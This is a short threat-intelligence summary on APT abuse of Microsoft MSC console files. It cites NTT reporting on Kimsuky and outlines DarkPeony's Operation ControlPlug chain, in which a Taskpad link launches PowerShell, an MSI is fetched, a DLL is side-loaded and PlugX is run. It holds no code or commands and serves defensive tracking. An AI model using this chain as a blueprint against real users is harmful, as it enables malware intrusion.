NTT notes that Kimsuky abuse of MSC files had been reported since April 2024, placing Microsoft Common Console documents among techniques already adopted by multiple APT groups. The detailed case in the excerpt is DarkPeony’s Operation ControlPlug rather than a Kimsuky intrusion, but it shows how an MSC Console Taskpad link can launch PowerShell when a user clicks a disguised interface element. In that chain, PowerShell downloads an MSI package, a legitimate EXE performs DLL side-loading, a DAT file is decoded, and PlugX is launched. The campaign’s MSI delivery sites sometimes used Cloudflare restrictions, which NTT assesses may have been intended to block researchers or automated analysis while still allowing target access. For DPRK-focused tracking, the supported finding is limited to Kimsuky’s reported use of MSC files, with the DarkPeony chain providing context on why MSC abuse is operationally significant.